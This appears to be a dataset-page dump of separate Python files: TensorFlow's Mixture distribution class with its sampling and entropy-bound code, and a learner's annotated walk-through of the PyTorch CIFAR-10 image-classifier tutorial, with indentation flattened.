for k, v in self:
try:
index = keys.index(k)
except ValueError:
keys.append(k)
items.append((k, [v]))
else:
items[index][1].append((v))
for item in items:
yield item
else:
for item in self:
yield item
| |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The Mixture distribution class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.contrib.distributions.python.ops import categorical
from tensorflow.contrib.distributions.python.ops import distribution
from tensorflow.contrib.distributions.python.ops import distribution_util
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_ops
class Mixture(distribution.Distribution):
"""Mixture distribution.
The `Mixture` object implements batched mixture distributions.
The mixture model is defined by a `Categorical` distribution (the mixture)
and a python list of `Distribution` objects.
Methods supported include `log_prob`, `prob`, `mean`, `sample`, and
`entropy_lower_bound`.
"""
def __init__(self,
cat,
components,
validate_args=False,
allow_nan_stats=True,
name="Mixture"):
"""Initialize a Mixture distribution.
A `Mixture` is defined by a `Categorical` (`cat`, representing the
mixture probabilities) and a list of `Distribution` objects
all having matching dtype, batch shape, event shape, and continuity
properties (the components).
The `num_classes` of `cat` must be possible to infer at graph construction
time and match `len(components)`.
Args:
cat: A `Categorical` distribution instance, representing the probabilities
of `distributions`.
components: A list or tuple of `Distribution` instances.
Each instance must have the same type, be defined on the same domain,
and have matching `event_shape` and `batch_shape`.
validate_args: Python `bool`, default `False`. If `True`, raise a runtime
error if batch or event ranks are inconsistent between cat and any of
the distributions. This is only checked if the ranks cannot be
determined statically at graph construction time.
allow_nan_stats: Boolean, default `True`. If `False`, raise an
exception if a statistic (e.g. mean/mode/etc...) is undefined for any
batch member. If `True`, batch members with valid parameters leading to
undefined statistics will return NaN for this statistic.
name: A name for this distribution (optional).
Raises:
TypeError: If cat is not a `Categorical`, or `components` is not
a list or tuple, or the elements of `components` are not
instances of `Distribution`, or do not have matching `dtype`.
ValueError: If `components` is an empty list or tuple, or its
elements do not have a statically known event rank.
If `cat.num_classes` cannot be inferred at graph creation time,
or the constant value of `cat.num_classes` is not equal to
`len(components)`, or all `components` and `cat` do not have
matching static batch shapes, or all components do not
have matching static event shapes.
"""
parameters = locals()
if not isinstance(cat, categorical.Categorical):
raise TypeError("cat must be a Categorical distribution, but saw: %s" %
cat)
if not components:
raise ValueError("components must be a non-empty list or tuple")
if not isinstance(components, (list, tuple)):
raise TypeError("components must be a list or tuple, but saw: %s" %
components)
if not all(isinstance(c, distribution.Distribution) for c in components):
raise TypeError(
"all entries in components must be Distribution instances"
" but saw: %s" % components)
dtype = components[0].dtype
if not all(d.dtype == dtype for d in components):
raise TypeError("All components must have the same dtype, but saw "
"dtypes: %s" % [(d.name, d.dtype) for d in components])
static_event_shape = components[0].event_shape
static_batch_shape = cat.batch_shape
for d in components:
static_event_shape = static_event_shape.merge_with(d.event_shape)
static_batch_shape = static_batch_shape.merge_with(d.batch_shape)
if static_event_shape.ndims is None:
raise ValueError(
"Expected to know rank(event_shape) from components, but "
"none of the components provide a static number of ndims")
# Ensure that all batch and event ndims are consistent.
with ops.name_scope(name, values=[cat.logits]) as ns:
num_components = cat.event_size
static_num_components = tensor_util.constant_value(num_components)
if static_num_components is None:
raise ValueError(
"Could not infer number of classes from cat and unable "
"to compare this value to the number of components passed in.")
# Possibly convert from numpy 0-D array.
static_num_components = int(static_num_components)
if static_num_components != len(components):
raise ValueError("cat.num_classes != len(components): %d vs. %d" %
(static_num_components, len(components)))
cat_batch_shape = cat.batch_shape_tensor()
cat_batch_rank = array_ops.size(cat_batch_shape)
if validate_args:
batch_shapes = [d.batch_shape_tensor() for d in components]
batch_ranks = [array_ops.size(bs) for bs in batch_shapes]
check_message = ("components[%d] batch shape must match cat "
"batch shape")
self._assertions = [
check_ops.assert_equal(
cat_batch_rank, batch_ranks[di], message=check_message % di)
for di in range(len(components))
]
self._assertions += [
check_ops.assert_equal(
cat_batch_shape, batch_shapes[di], message=check_message % di)
for di in range(len(components))
]
else:
self._assertions = []
self._cat = cat
self._components = list(components)
self._num_components = static_num_components
self._static_event_shape = static_event_shape
self._static_batch_shape = static_batch_shape
# We let the Mixture distribution access _graph_parents since its arguably
# more like a baseclass.
graph_parents = self._cat._graph_parents # pylint: disable=protected-access
for c in self._components:
graph_parents += c._graph_parents # pylint: disable=protected-access
super(Mixture, self).__init__(
dtype=dtype,
reparameterization_type=distribution.NOT_REPARAMETERIZED,
validate_args=validate_args,
allow_nan_stats=allow_nan_stats,
parameters=parameters,
graph_parents=graph_parents,
name=ns)
@property
def cat(self):
return self._cat
@property
def components(self):
return self._components
@property
def num_components(self):
return self._num_components
def _batch_shape_tensor(self):
return self._cat.batch_shape_tensor()
def _batch_shape(self):
return self._static_batch_shape
def _event_shape_tensor(self):
return self._components[0].event_shape_tensor()
def _event_shape(self):
return self._static_event_shape
def _mean(self):
with ops.control_dependencies(self._assertions):
distribution_means = [d.mean() for d in self.components]
cat_probs = self._cat_probs(log_probs=False)
# This was checked to not be None at construction time.
static_event_rank = self.event_shape.ndims
# Expand the rank of x up to static_event_rank times so that
# broadcasting works correctly.
def expand(x):
expanded_x = x
for _ in range(static_event_rank):
expanded_x = array_ops.expand_dims(expanded_x, -1)
return expanded_x
cat_probs = [expand(c_p) for c_p in cat_probs]
partial_means = [
c_p * m for (c_p, m) in zip(cat_probs, distribution_means)
]
# These should all be the same shape by virtue of matching
# batch_shape and event_shape.
return math_ops.add_n(partial_means)
def _log_prob(self, x):
with ops.control_dependencies(self._assertions):
x = ops.convert_to_tensor(x, name="x")
distribution_log_probs = [d.log_prob(x) for d in self.components]
cat_log_probs = self._cat_probs(log_probs=True)
final_log_probs = [
cat_lp + d_lp
for (cat_lp, d_lp) in zip(cat_log_probs, distribution_log_probs)
]
concat_log_probs = array_ops.stack(final_log_probs, 0)
log_sum_exp = math_ops.reduce_logsumexp(concat_log_probs, [0])
return log_sum_exp
def _prob(self, x):
return math_ops.exp(self._log_prob(x))
def _sample_n(self, n, seed=None):
with ops.control_dependencies(self._assertions):
n = ops.convert_to_tensor(n, name="n")
static_n = tensor_util.constant_value(n)
n = int(static_n) if static_n is not None else n
cat_samples = self.cat.sample(n, seed=seed)
static_samples_shape = cat_samples.get_shape()
if static_samples_shape.is_fully_defined():
samples_shape = static_samples_shape.as_list()
samples_size = static_samples_shape.num_elements()
else:
samples_shape = array_ops.shape(cat_samples)
samples_size = array_ops.size(cat_samples)
static_batch_shape = self.batch_shape
if static_batch_shape.is_fully_defined():
batch_shape = static_batch_shape.as_list()
batch_size = static_batch_shape.num_elements()
else:
batch_shape = self.batch_shape_tensor()
batch_size = math_ops.reduce_prod(batch_shape)
static_event_shape = self.event_shape
if static_event_shape.is_fully_defined():
event_shape = np.array(static_event_shape.as_list(), dtype=np.int32)
else:
event_shape = self.event_shape_tensor()
# Get indices into the raw cat sampling tensor. We will
# need these to stitch sample values back out after sampling
# within the component partitions.
samples_raw_indices = array_ops.reshape(
math_ops.range(0, samples_size), samples_shape)
# Partition the raw indices so that we can use
# dynamic_stitch later to reconstruct the samples from the
# known partitions.
partitioned_samples_indices = data_flow_ops.dynamic_partition(
data=samples_raw_indices,
partitions=cat_samples,
num_partitions=self.num_components)
# Copy the batch indices n times, as we will need to know
# these to pull out the appropriate rows within the
# component partitions.
batch_raw_indices = array_ops.reshape(
array_ops.tile(math_ops.range(0, batch_size), [n]), samples_shape)
# Explanation of the dynamic partitioning below:
# batch indices are i.e., [0, 1, 0, 1, 0, 1]
# Suppose partitions are:
# [1 1 0 0 1 1]
# After partitioning, batch indices are cut as:
# [batch_indices[x] for x in 2, 3]
# [batch_indices[x] for x in 0, 1, 4, 5]
# i.e.
# [1 1] and [0 0 0 0]
# Now we sample n=2 from part 0 and n=4 from part 1.
# For part 0 we want samples from batch entries 1, 1 (samples 0, 1),
# and for part 1 we want samples from batch entries 0, 0, 0, 0
# (samples 0, 1, 2, 3).
partitioned_batch_indices = data_flow_ops.dynamic_partition(
data=batch_raw_indices,
partitions=cat_samples,
num_partitions=self.num_components)
samples_class = [None for _ in range(self.num_components)]
for c in range(self.num_components):
n_class = array_ops.size(partitioned_samples_indices[c])
seed = distribution_util.gen_new_seed(seed, "mixture")
samples_class_c = self.components[c].sample(n_class, seed=seed)
# Pull out the correct batch entries from each index.
# To do this, we may have to flatten the batch shape.
# For sample s, batch element b of component c, we get the
# partitioned batch indices from
# partitioned_batch_indices[c]; and shift each element by
# the sample index. The final lookup can be thought of as
# a matrix gather along locations (s, b) in
# samples_class_c where the n_class rows correspond to
# samples within this component and the batch_size columns
# correspond to batch elements within the component.
#
# Thus the lookup index is
# lookup[c, i] = batch_size * s[i] + b[c, i]
# for i = 0 ... n_class[c] - 1.
lookup_partitioned_batch_indices = (
batch_size * math_ops.range(n_class) +
partitioned_batch_indices[c])
samples_class_c = array_ops.reshape(
samples_class_c,
array_ops.concat([[n_class * batch_size], event_shape], 0))
samples_class_c = array_ops.gather(
samples_class_c, lookup_partitioned_batch_indices,
name="samples_class_c_gather")
samples_class[c] = samples_class_c
# Stitch back together the samples across the components.
lhs_flat_ret = data_flow_ops.dynamic_stitch(
indices=partitioned_samples_indices, data=samples_class)
# Reshape back to proper sample, batch, and event shape.
ret = array_ops.reshape(lhs_flat_ret,
array_ops.concat([samples_shape,
self.event_shape_tensor()], 0))
ret.set_shape(
tensor_shape.TensorShape(static_samples_shape).concatenate(
self.event_shape))
return ret
def entropy_lower_bound(self, name="entropy_lower_bound"):
r"""A lower bound on the entropy of this mixture model.
The bound below is not always very tight, and its usefulness depends
on the mixture probabilities and the components in use.
A lower bound is useful for ELBO when the `Mixture` is the variational
distribution:
\\(
\log p(x) >= ELBO = \int q(z) \log p(x, z) dz + H[q]
\\)
where \\( p \\) is the prior distribution, \\( q \\) is the variational,
and \\( H[q] \\) is the entropy of \\( q \\). If there is a lower bound
\\( G[q] \\) such that \\( H[q] \geq G[q] \\) then it can be used in
place of \\( H[q] \\).
For a mixture of distributions \\( q(Z) = \sum_i c_i q_i(Z) \\) with
\\( \sum_i c_i = 1 \\), by the concavity of \\( f(x) = -x \log x \\), a
simple lower bound is:
\\(
\begin{align}
H[q] & = - \int q(z) \log q(z) dz \\\
& = - \int (\sum_i c_i q_i(z)) \log(\sum_i c_i q_i(z)) dz \\\
& \geq - \sum_i c_i \int q_i(z) \log q_i(z) dz \\\
& = \sum_i c_i H[q_i]
\end{align}
\\)
This is the term we calculate below for \\( G[q] \\).
Args:
name: A name for this operation (optional).
Returns:
A lower bound on the Mixture's entropy.
"""
with self._name_scope(name, values=[self.cat.logits]):
with ops.control_dependencies(self._assertions):
distribution_entropies = [d.entropy() for d in self.components]
cat_probs = self._cat_probs(log_probs=False)
partial_entropies = [
c_p * m for (c_p, m) in zip(cat_probs, distribution_entropies)
]
# These are all the same shape by virtue of matching batch_shape
return math_ops.add_n(partial_entropies)
def _cat_probs(self, log_probs):
"""Get a list of num_components batchwise probabilities."""
which_softmax = nn_ops.log_softmax if log_probs else nn_ops.softmax
cat_probs = which_softmax(self.cat.logits)
cat_probs = array_ops.unstack(cat_probs, num=self.num_components, axis=-1)
return cat_probs
| |
# http://pytorch.org/tutorials/beginner/blitz/cifar10_tutorial.html
# 2017-Oct-30 02:12
# WNixalo
# TRAINING A CLASSIFIER
# Generally for data you can use std python packages that load data into a
# NumPy Array. Then convert this array into a torch.*Tensor
# * For images: Pillow & OpenCV are useful
# * For audio: scipy & librosa
# * For text: either raw Python or Cython based loading, or NLTK & SpaCy
# torchvision is specfly created for vision; has data loaders for common data-
# sets: ImageNet, CIFAR10, MNIST, etc. and data trsfmrs for images, viz.,
# torchvision.datasets, and torch.utils.data.DataLoader
# this tutorial will use the CIFAR10 dataset. CIFAR-10 imgs are size 3x32x32
# (10 classes)
# TRAINING AN IMAGE CLASSIFIER
# 1. Load and Normalize the CIFAR10 training/test datsets using torchvision
# 2. Define a Convolutional Neural Network
# 3. Define a Loss Function
# 4. Train the network on the trainind data
# 5. Test the network on the test data
# 1. LOADING AND NORMALIZING CIFAR10
# Using torch vision:
import torch
import torchvision
import torchvision.transforms as transforms
# torchvision datasets output are PILImage images of range[0,1]. We trsfm them
# to Tensors of normalized range[-1,1]
transform = transforms.Compose(
[transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])
trainset = torchvision.datasets.CIFAR10(root='./data', train=True,
download=True, transform=transform)
trainloader = torch.utils.data.DataLoader(trainset, batch_size=4,
shuffle=True, num_workers=2)
testset = torchvision.datasets.CIFAR10(root='./data', train=False,
download=True, transform=transform)
testloader = torch.utils.data.DataLoader(testset, batch_size=4,
shuffle=False, num_workers=2)
classes = ('plane', 'car', 'bird', 'cat',
'deer', 'dog', 'frog', 'horse', 'ship', 'truck')
classes = ('plane', 'car', 'bird', 'cat',
'deer', 'dog', 'frog', 'horse', 'ship', 'truck')
# Showing some of the training images:
import matplotlib.pyplot as plt
import numpy as np
# functions to show an image
def imshow(img):
img = img / 2 + 0.5 # unnormalize
npimg = img.numpy()
plt.imshow(np.transpose(npimg, (1, 2, 0)))
plt.show()
# get some random training images
dataiter = iter(trainloader)
images, labels = dataiter.next()
# show images
imshow(torchvision.utils.make_grid(images))
# print labels
print(' '.join('%5s' % classes[labels[j]] for j in range(4)))
# 2. DEFINE A CONVOLUTIONAL NEURAL NETWORK
# modifying the NN form the NN section to take 3-channel images instead of 1
from torch.autograd import Variable
import torch.nn as nn
import torch.nn.functional as F
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.conv1 = nn.Conv2d(3, 6, 5)
self.pool = nn.MaxPool2d(2, 2)
self.conv2 = nn.Conv2d(6, 16, 5)
self.fc1 = nn.Linear(16 * 5 * 5, 120)
self.fc2 = nn.Linear(120, 84)
self.fc3 = nn.Linear(84, 10)
def forward(self, x):
x = self.pool(F.relu(self.conv1(x)))
x = self.pool(F.relu(self.conv2(x)))
x = x.view(-1, 16 * 5 * 5)
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = self.fc3(x)
return x
net = Net()
# 3. DEFINE A LOSS FUNCTION AND OPTIMIZER
# using classification cross entropy loss & sgd w/ momentum
import torch.optim as optim
criterion = nn.CrossEntropyLoss()
optimizer = optim.SGD(net.parameters(), lr=0.001, momentum=0.9)
# 4. TRAIN THE NETWORK
# loop over the data iterator, and feed the inputs to the network & optimize:
for epoch in range(2): # loop over datset multipl times
running_loss = 0.0
for i, data in enumerate(trainloader, 0):
# get inputs
inputs, labels = data
# wrap them in Variable
inputs, labels = Variable(inputs), Variable(labels)
# zero the parameter gradients
optimizer.zero_grad()
# forward + backward + optimize
outputs = net(inputs)
loss = criterion(outputs, labels)
loss.backward()
optimizer.step()
# print statistics
running_loss += loss.data[0]
if i % 2000 == 1999: # print every 2000 mini-batches
print('[%d, %5d] loss: %.3f' %
(epoch + 1, i + 1, running_loss / 2000))
running_loss = 0.0
print('Finished Training')
# 5. TEST THE NETWORK ON THE TEST DATA
# checking predicted class label against ground-truth
# displaying an image from the test set:
dataiter = iter(testloader)
images, labels = dataiter.next()
# print images
imshow(torchvision.utils.make_grid(images))
print('GroundTruth: ', ' '.join('%5s' % classes[labels[j]] for j in range(4)))
# now running the network on these:
outputs = net(Variable(images))
# The outputs are energies for the 10 classes. The higher the more the network
# thinks that image is that particular class. Getting index of highest energy:
_, predicted = torch.max(outputs.data, 1)
print('Predicted: ', ' '.join('%5s' % classes[predicted[j]] for j in range(4)))
# Looking at how network performs on the entire dataset:
correct = 0; total = 0
for data in testloader:
images, labels = data
outputs = net(Variable(images))
_, predicted = torch.max(outputs.data, 1)
total += labels.size(0)
correct += (predicted == labels).sum()
print('Accuracy of the network on the 10000 test images: %d %%' % (
100 * correct / total))
# Chance is 10%. Viewing the classes the network did well on and not:
class_correct = list(0. for i in range(10))
class_total = list(0. for i in range(10))
for data in testloader:
images, labels = data
outputs = net(Variable(images))
_, predicted = torch.max(outputs.data, 1)
c = (predicted == labels).squeeze()
for i in range(4):
label = labels[i]
class_correct[label] += c[i]
class_total[label] += 1
for i in range(10):
print('Accuracy of %5s : %2d %%' % (
classes[i], 100 * class_correct[i] / class_total[i]))
# TRAINING ON GPU:
# You transfer a Neural Net to the GPU the same way you trsfr a Tensor. This'll
# recursively go over all modules and convert their parameters and buffers to
# CUDA tensors:
net.cuda()
# Remember you'll have to send inputs & targets at every step to the GPU too:
inputs, labels = Variable(inputs.cuda()), Variable(labels.cuda())
# the bigger this network (it's v.small r.now) the greater the speedup.
#
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.